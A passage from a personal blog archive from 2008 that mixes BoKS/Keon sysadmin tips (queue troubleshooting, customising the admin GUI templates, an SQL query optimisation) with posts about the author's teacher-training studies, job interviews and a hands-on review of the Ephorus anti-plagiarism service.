If this doesn't return the definition for the client server, the keys have become unsynchronised. Reset them and restart the BoKS client software using the Boot command.



4. Check BoKS error logs.

This should be pretty self-explanatory. Read the /var/opt/boksm/boks_errlog file on both the master and the client to see if you can detect any errors there. If the log file doesn't mention something about the hosts involved you should be able to find the cause of the problem pretty quickly.

NOTE: What can we do about it?

If you're really desperate to get rid of the queue, do the following

Keon> boksdiag fque -bridge -delete $client-ip

At one point in time we thought it would be wise to manually delete messages from the spool directories. Do not under any circumstance touch the crypt_spool and master_spool directories in /var/opt/boksm. Really: DON'T DO THIS! This is unnecessary and will lead to troubles with BoKS.


kilala.nl tags: , ,

View or add comments (curr. 0)

No honor among peers: plagiarism is uncool

2008-11-19 20:57:00

T-Rex bullied someone into making his homework!

Well, this is certainly ironic... Not half a year ago my profs at college sang praise of the work I was doing and how helpful it was to publish my notes, calculations and papers on the web. This took a turn today when I received an e-mail from my mentor, asking me to remove all of my work from the web.

Apparently there is no honor among peers and there's a bunch of students that decided to be assholes and completely rip off my work. Of course it was never my intention to help people commit fraud at college. I have faith in my peers and counted on fellow students to have the balls to do their own work.

Publishing my schoolwork was always meant to be an inspiration for fellow students, possibly helping them along in their own pursuits. It'd be great if a glance or two at my work had helped them over that little bump they'd run into. I explicitly mention on my site that people shouldn't be dicks and that my work is not meant to be turned in as their own. I warn the readers that any repercussions following plagiarism of my work are their own responsibility and that I won't be held accountable for their assholish behaviour.

Anyway... It's dilemma time! I dislike the thought of hampering my old profs in their daily work. They made me feel at home at HU and they taught me a lot. On the other hand, I believe that removing my work from the web will only amount to fighting symptoms. Students will always share papers among themselves, it's just that mine are more visible. Besides, it's a very real possibility that at least a dozen students have already downloaded every single file I put up on the web, so it's impossible to stamp out any copying from my work.

I explained to my mentor that this high visibility of my work could also work in their advantage. If they'd consider using anti-plagiarism software like Ephorus, all the work turned in by students would be automatically checked against any papers findable through the web including mine.

I'll be honest and admit that having my work up on my site is also in part down to my sense of pride. I'm fscking proud of all the hard work I did last school year and I believe that my papers are also a testimony to my qualities in documentation and education. Call it my portfolio if you will.

I'll mull things over a bit and have another chat with my profs. Let's see if we can find some common ground in this.


kilala.nl tags: , , ,

View or add comments (curr. 2)

The BoKS/Keon users group is taking off!

2008-10-29 09:44:00

About a week ago I opened up the BoKS Access Control users group (LinkedIn) on LinkedIn.com. My goal was to unite BoKS/Keon admins from across the globe in order to build a tightly knit network in which we can all share our knowledge of BoKS.

The thing is, the way things are right now, there's hardly any information on the web about BoKS/Keon. First off "BoKS" is a four letter word, which makes it hard for Google to look for anything useful (especially since it keeps correcting it to "books"). Second, there's not that much on the web anyway! There's my website which has some real info and then there's the Fox Tech site which has general sales info. For some reason Fox Tech decided to hide all the manuals and in-depth stuff so only paying customers can get to the docs.

By building a professional network of BoKS users we finally know who to turn to for questions! LinkedIn allows us to post discussions inside our group and since folks from Fox Tech are also joining, we're bound to get some good answers!

Right now we're at 31 members but, since Fox has started advertising the group to their customers, I'm assuming we'll see a steady rise in members RSN(tm)!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Modifying the BoKS GUI

2008-10-20 08:10:00

In most cases the BoKS administration GUI serves its purpose. It's pretty spartan, though it can look a bit crowded at times. This isn't altogether that strange, as FoxT have used the same GUI layout for years on end. It's getting a bit long in the tooth.

Sometimes though you'll run into things that you'd like to do from the GUI, but which aren't implemented (yet). And that's where the hacking starts ^_^ In this article I'll go over the basic structure of the GUI's files and resources, explaining the function of each part. I'll also discuss a few of the changes we've made (or are contemplating) at $CLIENT.

Structure of the GUI files and resources

As is mentioned elsewhere, BoKS runs a custom webserver on ports 6505 and 6506 (default ports). This webserver gets started using the $BOKS_etc/boksinit.master script and, as the name implies, only runs on the master server.

All resources for the management GUI are stored in $BOKS_lib/gui. There you will find four subdirectories.

Keon> ls $BOKS_lib/gui

etc

forms

public

tcl

To start with, the public directory contains those few files that are accessible without having logged on. Naturally these files are limited to the various login screens, ie password/certificate/securid. Nothing more, nothing less.

The etc directory contains all the template files (.tmpl) that are used to create the GUI, as well as all of the image files. Most images are limited to the black banner at the top.

The forms directory consists of files and directories that form the menu structure of the GUI. There's a .menu file for each option in the main menu and a directory containing more .menu's for options that have sub-menus. This directory also contains all of the .form files that are used to enter or edit information.

Finally, the tcl directory contains the TCL code that does the actual work. Whenever you've edited a form to update information in the database, this code gets used to perform the actual modifications.

Including the domain name in the banner

One of the first mods that I wanted to make to our GUI was to include the names of the BoKS domain and the master/replica server in the black banner of each page. That way it would be impossible to mix up in which domain you're working, thus lowering the chance of FUBARs. Later on I also decided it would be a good idea to include the domain name in each page's title. Of course this mod isn't as useful if you're only running one domain.

To make the desired changes we'll need to edit a number of .tmpl files in $BOKS_lib/gui/etc/eng. The changes will be making are along these lines.

Original:

<html>

<title>

Welcome to FoxT BoKS

</title>

<body><body TEXT="000000" LINK="#0000FF" ALINK="#0000FF" VLINK="#0000FF">



<table bgcolor="black" width="100%">

<tr><td align="center">< IMG SRC="@PUBLIC@/eng/figs/welcome.gif" alt="Welcome to FoxT BoKS"></td></tr>

</table>

Modified:

<html>

<title>

CAT DOMAIN: Welcome to FoxT BoKS

</title>

<body><body TEXT="000000" LINK="#0000FF" ALINK="#0000FF" VLINK="#0000FF">



<table style="color: #000000;" bgcolor="black" width="100%">

<tr><td align="center"><IMG SRC="@PUBLIC@/eng/figs/welcome.gif" alt="Welcome to FoxT BoKS"></td></tr>

<tr><td align="center">CAT DOMAIN, running on master server<i>Andijvie</i></td></tr>

</table>

As you can see, all I did was slightly modify the TITLE tag and I've added an additional row to the banner table. I've also tweaked the text colour in the banner, so it's not black on black.

The abovementioned changes need to be made in all of the .tmpl files on the master server. If you like, you could also make the mods on the replica servers, assuming that you may at one point in time need to failover to one of them. You never know when the master server might croak.


kilala.nl tags: , ,

View or add comments (curr. 4)

Keeping your Mac OS X applications up to date

2008-08-27 21:57:00

It's an obvious fact that I love Apple's Mac OS X. There's one feature though that's missing from OS X that I'd love to see implemented properly. So far, the guys who made App Fresh are doing great work in achieving this feature!

The feature in question: centralised updates for all the installed applications and prefpanes.

On my Macbook I have at least fifty different apps installed, each of which has its own way of getting updates. Some software, like Adium and iTerm, do automatic checks on their webservers and allow you to immediately install an update. Others, like Transmit and Unison, check for updates but require you to manually download and install a new version. It's all a bit hodge-podge. So how about we vie for a unified method of upgrading our software?

Enter the aforementioned AppFresh. After a brief configuration, AppFresh will search your hard drive for applications. Then, using the IUseThis.com database, it checks for new versions of your software and where to download them. Give AppFresh the order and he'll download and install all the updates in one fell swoop! Great!

Of course, such a course of action should only be used in production environments after testing all the new software versions. I also haven't checked yet, but I'm curious to see if you can point AppFresh at your own software repository. That way you could build your own, centralised software repo for your company. Possibilities!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Dabbling with SQL

2008-07-17 08:46:00

Bwahah, this is priceless :D

Yesterday I'd spent an hour or two writing a PHP+SQL script for one of my colleagues, so he could get his hands on the report he needed. We have this big database with statistics (gathered over the course of a year) and now it was a matter of getting the right info out of there. Let's say that what we wanted was the following:

For four quarters, per host, the total sum of the reported sizes of file systems.

Now, because my SQL skills aren't stellar what I did was create a FOR-loop on a "select distinct" of the hostnames from the table. Then, for each loop instance I'd "select sum(size)" to get the totals for one date. But because we wanted to know the totals for four quarters, said query was run four times with a different date. This means that to get my hands on said information I was running 168 * 4 = 672 queries in a row. All in all, it took our box fifteen minutes to come up with the final answer.

On my way to work this morning a thought struck me: I really ought to be able to do this with four queries, or even with -one-! What I want isn't that hard! And in a flash of insight it came to me!

SELECT hostname, date, SUM(size) AS total FROM vdisks WHERE (date="2007-10-03" OR date="2008-01-01" OR date="2008-04-01" OR date="2008-07-01") GROUP BY hostname, date;

The runtime of the total query has gone from 15 minutes, to 1 second. o_O

Holy shit :D I guess it -does- pay to optimize your queries and applications!


kilala.nl tags: , , ,

View or add comments (curr. 0)

That, as they say, was that

2008-06-23 20:54:00

*sigh* That was it...

Today I had my last two exams of this school year and, barring any mishaps, I won't have to redo them. Meaning that now my college career is officially over... For now. *sniffle* I'll definitely miss it.

Ah... *stretch* I'll be back in a few years; no doubt about that. Now! Off to do some work around the house!


kilala.nl tags: , ,

View or add comments (curr. 4)

All my term papers for History 2 (Geschiedenis 2 - Vakgedeelte)

2008-06-19 21:37:00

One of the few second year's courses that I got out of the way in my first year at college is History 2, ie Geschiedenis 2 - Vakgedeelte. I'd planned on leaving the didactical part of the course until the next year.

The workload for this course isn't that high and it mostly depends on the students reading a whole book on the history of mathematics. Starting at the arithmetic of the Egyptians and Babylonians we proceed through India, Arabia, the middle ages and the Renaissance to discover how maths evolved through the ages. Surprisingly most of the really interesting stuff starts around the seventeenth century. -Astoundingly-, over 90% of the maths we know was invented after 1900. o_O



Biography of Euclid

As part of the preparations for our exam, each student was asked to write a two page biography of a famous mathematician. I was assigned Euclid (Euclides in dutch).

This document is available as a .PDF document and can be downloaded here.



Summary of "Math through the ages"

This course relies on a syllabus made by the Hogeschool and the Math through the ages book by Berlinghoff and Gouvea (Amazon.com). Since the book's rather voluminous I reckoned I'd write a summary of the whole thing, with some stuff from the syllabus thrown in.

This document is available as a .PDF document and can be downloaded here.



Assignments 7.3 through 7.6

One of the minor assignments we were given was to work out a few ancient, dutch math assignments. Well, ancient? Sixteenth, seventeenth century like-stuff. It was actually fun to try and decypher the instructions given in the original texts.

This document is available as a .PDF document and can be downloaded here.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

It's great to know one's work is appreciated

2008-06-03 15:05:00

Fuckin' A, man!

As the title of this post says: it's great to know that at least there's -someone- out there who appreciates the work you do :)

Case in point: I've been putting all my college term papers and summaries online and I've been keeping an extensive Wiki with class notes. From time to time a teacher or classmate will suggest that they've had some use for these sites, which is of course quite nice. But last night the aforementioned guidance counselor told me something that made me really happy ^_^

Next year she'll be teaching the second year's General didactics course. Because the course is currently given by one of our somewhat wishy-washy teachers, she was told that she'd have to hunt around and ask people for all the materials. I guess that most of the stuff was never really put to paper. Luckily Lisette knew about my site, found my summary and class notes and was done within a day. Her supervisor was perplexed! :D

So yeah, it's great to know that you're appreciated ^_^


kilala.nl tags: , , ,

View or add comments (curr. 2)

An exciting week up ahead!

2008-06-01 20:16:00

Little D, having a hard time sleeping. Courtesy of sinfest.net.

Man o man, is this week going to be exciting and busy! ^_^

For starters, tomorrow will be completely jam-packed! I'll start off with a morning at one of the schools I'm interviewing with, to get a taste of their atmosphere. After our very pleasant meeting two weeks ago, we wanted to make sure that I like the school well enough before getting down to real business.

I'll then head off to school, which lasts from 1200 until 2000, mixing three different courses with a small project that we're working on. After that I'll meet up with my ever-so lovely guidance counselor, to have a chat about my progress at school. She's been of great help to me this year and I think we can both be pleased with the progress I've made. :)

Tuesday, thursday and friday will be spent at the office, doing what we always do :) I'm working on a rather important project, which consists mostly of paperwork, to ensure the SOX compliancy of $CLIENT.

Wednesday will be a rather special day... I've taken the full day off from work (man, school is really cutting into my vacation hours!), to tackle no less than three interviews!

In the morning I'll visit a school here in Utrecht. They're pretty big on that New Learning thing and I'm quite interested to see how their school works. My classmate Badegul has told me a little about their school and they seem like a rather interesting lot! They're on the up-and-up when it comes to modern teaching methods.

Around lunch I'll pay a visit to Red Five in Woerden. They're the software developers and hosting company behind most of Ephorus' products. I spoke to Ephorus' director a few weeks ago and he set up a meeting for me at Red Five. Maybe I'll be able to provide some consulting on the side for these guys, while I'm working in education. Who knows? ^_^

Finally, in the late afternoon, I'll have a second job interview at a school in Maarsbergen. They only focus on the VMBO level of high school education, meaning that they're focused on getting kids ready for blue collar jobs and the service industry. Their school seems very nice, insofar that it's a bit small and everyone's acquainted. Also, their school's located in an old monastery in the middle of the woods. How cool is that?!

Finally, finally, next weekend will be Snow's annual summer get-together. This year, the whole company will gather on Texel (one of the islands on the dutch coast) to have some fun in the sun and sand. A whole bunch of them are going skydiving, but I opted to take along my homework and to ride my bike around a little bit.

So! Busybusybusy! But I'm actually feeling quite well under all the stress! ^_^


kilala.nl tags: , ,

View or add comments (curr. 3)

Interviewing at regional high schools

2008-05-22 21:49:00

Today I took a few hours off from work, so I could go out for an interview at Oosterlicht College high school. I'd seen on their website that they were looking for math teachers and thought I ought to give it a whirl.

Their school is quite large, with around 1800 students at their main location, but I've heard good stuff about them. Besides, the school's been divided into two virtual departments, meaning that I'll only interact with about half of that number of students. In this case the job I'm shooting for is part of the VMBO track (the bottom of three ranks in the dutch high school system).

I had a nice talk with the section chief and the head of the maths team, which lasted for about 75 minutes. I think they were at least moderately interested in having me on their team and we agreed that I'd come and observe the school in full swing RSN(tm). If, after those few hours, I'd still like to work at the OC, then we'll have our official talk about the terms and such. So far, things are looking good :)

I was also reassured that, as a teacher, I wouldn't have to earn a lot less than what I'm getting right now. In the dutch educational system (primary and high school), personnel is divided into four salary groups: LA, LB, LC and LD. As a high school teacher I'd rank in LB, meaning that I'd start out at 2250 euros a month. However, since most schools are willing to match your current paycheck if you're leaving another field, I'd be making more. This would put me over halfway of the salary playing field in the LB class. In the end, this means that I won't be taking a pay cut, but that there is definitely less space for me to grow in the future.

Anywho... I'm quite excited about my first interview in the educational system! I was a bit anxious before we got started, but I soon felt at ease. It was just like any other interview I'd been too. Just a bit friendlier and for once I wasn't the stronger party :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

"Banenmarkt", what an afternoon

2008-05-14 21:08:00

Wow, I am -beat-! =_=

The 1.5 hours I spent at the Banenmarkt at college really took it's toll on me :) It was a great gathering and I managed to speak to everyone I wanted to just barely within the time limit.

I dropped off a total of eight resumes, spoke to reps of eleven schools and have a few very good prospects. I also spoke with folks from three other educational organisations and their information was rather valuable as well (such as the perfectly swank Het Utrechts VO in kaart booklet).

A few reps seemed moderately positive about my suggestion of combining a teaching position/internship, with a full-time supporting role at their school. So that's a good sign :)

Right now, while I am still able of forming coherent sentences, I'm making sure I get all their contact info into my address book, so I can't lose it. After that I'm off to bed... I need some sleep...


kilala.nl tags: , , ,

View or add comments (curr. 0)

"Banenmarkt" at Hogeschool Utrecht

2008-05-14 09:27:00

A blouse, my resume and some calling cards.

An ironed shirt, a stack of resumes and a pouch of calling cards... This can only mean one thing! We're going networking again! ^_^

Today my department in college (hint: the .edu dept) 's holding their annual banenmarkt; call it a "career day" if you will. For about three hours, students will get a chance to talk to reps from all kinds of high schools in our region. The objective, of course, is to get your foot in the door for an internship or a teaching position.

As I mentioned earlier, I'm on the lookout for a real teaching position. I need the experience and I'm anxious to try my hand at a steady teacher's job. So, while I will definitely grasp any internships I can get, I will be on the prowl for fulltime jobs. Or at least to get my name out there.

This is going to be interesting! :)


kilala.nl tags: , ,

View or add comments (curr. 2)

Richard Fitzpatrick - "Euclid's elements of geometry"

2008-05-06 21:51:00

One artist's rendition of Euclid

A few weeks ago I wrote about my research on Euclid, the ancient Greek mathematician. Said research wasn't anything noteworthy, just something to form a basis for a biography written for a school assignment.

Back then I also wrote about a man called Richard Fitzpatrick and his remarkable work. You see, Mr Fitzpatrick took a nineteenth century translation of the Elements of geometry by Euclid and reworked into a new book. Each page of this book is split in two: one column with a greek text approaching the greek original and one column with a modern english translation. While the greek text doesn't add much for the budding mathematician, it does add a definite factor of "cool" ^_^

Mr Fitzpatrick's book can be downloaded for free as a PDF, but you can also buy a printed version from Lulu.com. Lulu.com allows you to publish your own books at a very low price, which many academics and aspiring authors put to good use. $27 (including S&H) bought me a beautiful, hard cover book with an accessible translation of Euclid's Elements. The sleek, black cover looks quite nice and the fact that the book is printed on A4 paper makes it very easy to read.

Now... I shot some video while leafing through the book, just to give you an impression. The video came out a bit blurry, but that's what I get for using my compact camera under fluorescent lighting ^_^;

Euclid.mov


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Holy wars, every profession has them

2008-04-30 12:46:00

Whenever two or more parties are convinced that they're on the side of absolute right holy wars pop up. I'm not just talking about the religious conflicts that we see every day, but also professional debates that are verging on religion.

Windows versus Linux versus Mac OS X. Emacs versus Vi versus Pico. Sendmail versus just about any decent email server. Japanese cars versus American cars versus European cars. Ketchup-on-your-steak versus Ketchup-lovers-should-die. Whatever, there's too much to even think of!

The field of education unfortunately is no different. Many people think that they know what's best for today's kids and thus philosophies about teaching vary greatly! For example, in December I wrote about the Het nieuwe leren versus Het oude leren crowds. The first think that the folks over at BON are decrepit relics from a time better forgotten. The latter think that the HNL crowd are nonsensical managers lusting for new and shiny toys. And neither side is willing to give in one inch, or to even concede that the other side has at least -some- merit.

Great.

One of the stories that's been recently snapped up by the BON-folks, is the story of Jan Verhoeven's family and their experiences with De Nieuwste School in Tilburg (The Newest School). While the Verhoevens are actually quite content in their role as chroniclers, the two battling sides grasp any chance to duke it out. The BON-ers ragged on the school on their fora, in their usual fashion. At the same time the DNS-folks grasp at any chance to portray themselves in an overly positive fashion, by grabbing media attention and by spawn camping the relevant Wikipedia pages. So instead of working on a real solution, both sides are just too fscking concerned with their little battles.

Very productive, que no?

Me, I'm just glad that the Verhoevens are alright and that their daughter's happy at her new school after getting out of De Nieuwste School


kilala.nl tags: , , ,

View or add comments (curr. 8)

It's official: I'm job hunting as a teacher

2008-04-28 18:16:00

As the title suggests: I've officially started hunting for teaching positions for next school year. So far I've found a few very interesting schools that are actually quite close to home!

Let's see how this pans out.

Any of you Snowers reading this: no need to fret yet. I'm NOT running out on you on a moment's notice ;)


kilala.nl tags: , , ,

View or add comments (curr. 3)

Networking for fun and profit

2008-04-28 13:36:00

Until recently I used to hate networking, the perceived obligation to talk business with people whom I had no interest in. Over the past year or so a realisation has been growing in me though: networking is something that happens automatically, to a certain degree. And you can make the parts that need to happen consciously as fun as they need to be.

Example 1: Like many young folks in IT I hated the idea of networking and actually tried to avoid it. I reckoned that I had no network whatsoever and didn't care about it that much either. However, after eight years of working in IT I realised that I -do- have a network and that it's rather expansive! My friend/colleague Deborah recently nudged me to get onto Linked In and I managed to map out a large part of my network with minor effort. That's 150 names right there, that I can tap into if I ever need help with my job, a technical question, or whatever. In case you're curious, here's my profile.

So yes, everyone has a network. Even you. All the people you have worked with, or for? Network! All the friends you made at that IT conference? Network! And so on...

Example 2: Sometimes you stumble upon stuff that peaks your interest. Case in point, I recently poked around in and wrote a review about Ephorus. The product is Europe's leading anti-plagiarism software and both the teacher and the sysadmin in me got curious as to its workings. I managed to get my hands on a trial account (not normally given to students) and tried it out. I liked it well enough.

Then a few days later followed an e-mail from their directory, asking if I'd like to come in for a talk. We had a great chat this morning, about Ephorus, about my work, about their work and just stuff in general. I had a great time and I even got a few -very- helpful suggestions that could help my career in the near future.

So you see? Networking consists of two things: the stuff you do every single day and just shooting the breeze with people you don't know. The third part, the obligational marketing talks to possible customers, I'll leave to the sales folks ~_^


kilala.nl tags: , , ,

View or add comments (curr. 1)

All of my term papers for Analysis 1 (Analyse 1 - Didactiek)

2008-04-21 09:28:00

Analysis 1 - Didactics is one of the larger projects that the first year's students have to tackle. There are ten reports to be made, some of them rather largeish. To us the project is known as Analyse 1 - Didactiek - Rekenen is complex. Analysis in this case is the dutch name for what is know in the english speaking world as Calculus.

In short, this course focusses on the learning of arithmetic and math. We'll take close looks at the various algorithms that children need to learn and we'll even try and re-learn calculus ourselves by doing it all in Base-8 (octal). I found this class particularly challenging, mostly due to the pressure of having to hammer out these reports so quickly. All in all I did well though, since I managed to score a 90% at the end of the term :)



Dossieropdracht 1

Students are asked to re-learn arithmetic by doing it all in Base-8, instead of in Base-10. This way we would be forced to study addition, subtraction, multiplication and division like we were twelve year olds again. This was great fun! We also examined multiple methods to do multiplication.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 2

All of us are studying to become math teachers in high school, so it's only natural for us to focus on maths for teenagers. However, it is also a very interesting exercise to examine mathematics education in pre- and middle school. Using reports made by CITO called the PPON (Periodieke Peiling Onderwijs Niveau, more information here), we are asked to investigate the level of math knowledge at the end of preschool (K8 in the USA). We are also asked to search for any problem areas that our teenagers may have encountered in their education.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 3

One of the (comparatively) recent trends in mathematics education is realistic calculation (realistisch rekenen). The proponents of this method reason that students don't benefit from simply repeating algorithms all day. Instead, they'd like assignments to relate to reality by way of providing a context. That ought to keep students motivated, while also keeping maths "tangible" for them.

For this report, students are asked to investigate the pros and cons of realistic maths.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 4

This assignment is kind of similar to the first report: we will be re-learning various methods for division and for determining the square root of a number.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 5

Remedial teaching is an important part of education. Not every child will immediately grasp the concepts that you are explaining and some will have a downright hard time understanding the materials. As teachers we will need to understand why students make the mistakes they do and we'll need to know how to address these problems.

For this assignment we'll be talking with kids, after taking a look at some of the mistakes they've made in their calculations. For my report I spoke with a few kids who'd recently done a test on coordinates.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 6

Continuing the research into thinking mistakes, the student is given five separate situations to analyse. In each, people have made mistakes in their assumptions or calculations and it's up to the students to find and explain them.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 7

The students are asked to do some book research on learning disabilities and disorders that may affect kids in learning mathematics.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 8

For this assignment students will treat the high school math education as a black box. We will be comparing the output of pre school with the output of high school to determine the process that takes place -in- high school. As input for our research we will be using the final exams of preschool and the final exams of maths education in the VMBO part of high school.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 9

We continue our research of realistic math by researching contexts used to teach about negative numbers. This is one of the notorious subjects in teaching high school maths.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 10

For our final report, we are asked to do a didactical analysis (didactische analyse) of the way that fractions, percentages and decimals are taught in high school. This starts off with some book research and ends with us pouring through books for the first three years of maths ed in high school. Nice :)

This document is available as a .PDF document and can be downloaded here.




kilala.nl tags: , , ,

View or add comments (curr. 0)

All my term papers for Student Care 1 (Project Zorgverbreding)

2008-04-21 09:01:00

In my third semester I only took one class, because I'd fallen behind in my work a little bit. Luckily, the semester's project Student Care (project zorgverbreding) wasn't very complicated.

In this course, students will explore the care for students with learning and personality disorders. ADHD, ADD, Asperger, Tourettes, Anorexia... You name it, we've got it. The assignment for each project team was to pick a number of disorders, each of which was to be studied on an individual basis. Each team member would report on the specifics of his chosen disorder, including information such as:

My chosen disorders (I accidentally picked two, instead of one) were anxiety (angststoornis) and mood disorders (stemmingstoornis, depression et al). Below you'll find my big report on the subject, two summary sheets and a flyer.



Individueel verslag

Each of the team's members was to compile a document on his chosen disorder. Mine covers anxieties and mood disorders.

This document is available as a .PDF document and can be downloaded here.



Informational flyer

The docent offered extra credit to each team for making additional, informational products. I took the time to create flyers for each of our disorders, based on the reports everyone'd written. My flyer is a compilation of the two summary sheets below.

This document is available as a .PDF document and can be downloaded here.



Summaries

In the course of our project, we were to hold a small presentation for other project teams. As a basis for this presentation, each group member wrote a summary of his materials.

These documents are available as a .PDF document and can be downloaded here and here.



Mind maps

In order to keep my research for this project organised, I've worked with so-called mind maps.

These mind maps are available as .PNG files and can be downloaded here and here.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Researching ancient mathematics

2008-04-20 14:16:00

Part of the 1482 print of Euclid's work.

This semester I'm taking the second year's course Geschiedenis 2 Vakgedeelte, which can be translated as History of math 2. Over the next two months we'll be taking a look at math through the ages, starting with the Egyptians and Babylonians.

As part of this course, each student is expected to write a short biography on one of the Great Mathematicians (tm). I was assigned Euclid (Euclides in dutch), which seems to be a very interesting topic. So far I've done some six hours of research and I've gotten a pretty good picture so far.

During my research I've run into some very cool things! Things that may be of interest to a lot of people :)

For instance, there's Rare Book Room.org. This website has gathered thousands and thousands of photographs of antique books. They've created a huge archive, so that mere mortals such as you and I can leaf through tomes that are normally in musea.

A 1482 print of Elements, by Euclid.

A 1613 print of Istoria e Dimostrazioni Intorno Alle Macchie Solar, by Galileo Galilei.

Another neat project is Euclid's elements of geometry by Richard Fitzpatrick. Mr Fitzpatrick has taken the 1883 Heiberg translation and used it to make a completely fresh english translation of Elements (Euclid's most famous work). You can download the book for free as a .PDF at the link provided, or you can fork over $28 to buy the hardcover print from Lulu.com. I'd say the print is definitely worth it! I've just ordered my copy, to support Mr Fitzpatrick's work.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Ephorus, anti-plagiarism software for teachers

2008-04-13 18:30:00

Recently, we were discussing a few anti-plagiarism measures over at the Scholieren.com forums. Plagiarism of course being a rather stupid and bad thing to do if you want any form of education.

One of the checks so far is to just take any suspect sentences and plonk them into Google. This actually works miraculously well, seeing how Google indexes the hell out of half the Internet. The only downside to this approach is that you really only ought to apply it to suspected plagiarism, because you really can't copy and paste a whole document into Google's search bar.

To make things easier, some people have tried their hand at making a Google frontend, but with little success. So we'll have to turn to commercial companies who have their proprietary front ends and search methods.

Enter Ephorus, stage left.

Ephorus anti-plagiarism

On their website, Ephorus boast about their services like any good marketeer would. The emphasis in the following is mine.

Never search for plagiarism yourself again? An end to all irritations and qualitatively better papers? No problem. With Ephorus, you can prevent plagiarism with no extra effort. Moreover, with this anti-plagiarism market leader, you will be assured of the best service and the lowest prices. With Ephorus, teaching will be fun again!

Not only teachers and students benefit from Ephorus. Examination boards also see an improvement in the quality of papers. And since teachers no longer lose precious time investigating possible plagiarism, more time can be devoted to education.

Alright, sounds like a sales pitch, right? :) You'll notice that I bolded out two fragments that are rather important: they make it sound like Ephorus is the end-all-be-all solution to spot plagiarism. Sadly, this is simply not true. I'll explain this in a little detail shortly, but the gist of it is that Ephorus only checks materials they have access to through the Internet (eg Google search) and from their own database.

Ironically, their best source of original texts and information are their own clients. By submitting a document for verification, the customer allows Ephorus to keep said document in their database for future reference. This is also why recently students have been clamouring about copyrights on their documents. While teachers and schools are made aware of the fact that documents will be stored indefinitely, students are never told such a thing. The only thing they see is an upload form that asks for their details. No warnings, no disclaimers, no nothing. I guess Ephorus leaves that up to their customers.

The legalities behind all this are debatable. There's such a thing as fair use for academic purposes, but one could reason that Ephorus' goals are not purely academic.

Toying with Ephorus: a cursory glance

My initial impressions of Ephorus were good! The interface looks clean, well designed and calm. There's nothing there to confuse you and it's a good example of form following function. The interfaces is divided into a few sections:

You will find screenshots of most parts of Ephorus at the bottom of this page.

So far I've found a few small nags with the Ephorus online interface.

All in all I'm well pleased with the Ephorus interface. It's user friendly enough and is pleasing to the eye.

Testing Ephorus on some real documents

Of course, what would a software review be without putting it through its paces?

I've selected a few documents from my own schoolwork and a few other sources and I've submitted them to Ephorus. These documents are:

Analysis 1, DO10 One of my original works and never before published on the Internet.
Statistics 1, DO5 One of my original works and available on my website since last year.
Border-line op school A document written by one of my project team members at school. Never before published on the Internet. Also, at least 40% of the text was copied straight from books.
Pride and prejudice Well, we all know this book, right? The classic by Jane Austen which has been freely available on the Internet for years.

The first document came out as expected and only slight traces of "plagiarism" were found. It scored a 3%, 2% of which was accredited to other documents that I'd written. Ephorus has marked parts of my cover page and my student information as being straight copies, which isn't remarkable. The final 1% came from the fact that I had literally quoted one paragraph (properly cited by the way) from a book.

By turning up the strictness a notch, another 2% were added to my score. Apparently the words Maar dat was niet het doel van were found on two separate pages on the Internet.

The second document I'd submitted came out as expected as well: 96%. Of course, I'd expected a 100%, because the file itself has been on my website for over half a year now. So that's a bit odd. What's even stranger is that the cover page and information that was picked up for the first document wasn't flagged at all this time.

Disturbingly, my group member's document scored a measly 3%, in spite of his liberal copying. This can only be accredited to the fact that Ephorus cannot and does not search through books. Ephorus only relies on digital resources that it has free access to.

Finally, Jane Austen's Pride and prejudice was properly picked up at 98%. It would've been scary if Ephorus'd missed out on this ^_^

Personally, I think that the look and feel of the reports are just right. They could've been much prettier, or take the original document's formatting into account, but I reckon that would detract from its purpose. The reports offer just what a professor would need:

Fiddling with the strictness controls shows me that it modifies the amount of words that do NOT have to be similar in one sentence. By setting the level to "strict", Ephorus will also point out any lines that share a number of words (but not all of them) with another source.

In conclusion

Earlier, I promised to tell you why Ephorus isn't the end-all-be-all solution to plagiarism. And it's not something that only applies to Ephorus, but something that goes for all of its competitors as well.

This software does not search books, magazines, research papers and other published print.

Case in point: my classmates document came through fine. This means that teachers will always need to be on the lookout for plagiarism anyway. Ephorus and its ilk are just a first barrier that documents need to get through. And it's in that respect that I quite like Ephorus.

I'm glad that the Ephorus team gave me the chance to try out their software. I'm convinced that it makes a nice addition to the teacher's toolbox, even if it doesn't save him much work.

Screenshots

1

2

3

4

5

6

7

8

9

10

11

 




The Ephorus name and logo are of course copyright of Ephorus. All my screenshots were taken using the demo version of their website.


kilala.nl tags: , , , ,

View or add comments (curr. 16)

Aw yea! More results for school

2008-04-10 15:03:00

As I wrote in one of the comments I got a 90% for our project about students with learning and personality disorders. That was awesome.

Well, today got even more awesome, because I just got my -second- 90%! /o/

Analysis 1 - Didactics (about the teaching of basic math) consisted of ten separate reports. They came back as five 90%'s, three 80%'s and two 70%'s.

I'm grinning from ear to ear here :D


kilala.nl tags: ,

View or add comments (curr. 0)

Oral defense of this semester's project

2008-04-09 11:05:00

Last monday my project team had its appointment for our oral defense of our essays. This was the first time we've had to do such a thing, since most docent's are happy just reading through our papers. In this case however, the teacher wanted to prod our minds a little about some additional questions.

We came well prepared, as each of us had researched the questions we'd been given. In my case, the teach wanted to know about two things:

1. How would you go about planning a big workload for a depressed child, say for example his final exams?

2. What needs to be done if a depressed child becomes the victim of harassment by his peers?

Our defense went very well, with each of us answering all the questions to the teach's satisfaction. We actually had a good time and there was no stress at all :) In the end we were told that we could count on a 90%, assuming he didn't find any flaws in our final process reports. Nice!

I have to say that the docent did come off quite wishy-washy. We'd told him that our fifth group member had quit school no less than three times and he was still surprised when there was noone to answer the questions about the guy's report in depth. Uhm yeah, we told you? He left? Which also explains why he was about to completely skip my part of the interview, since he thought I was the guy who left. Scatterbrained much? :/ Jeez!...


kilala.nl tags: , ,

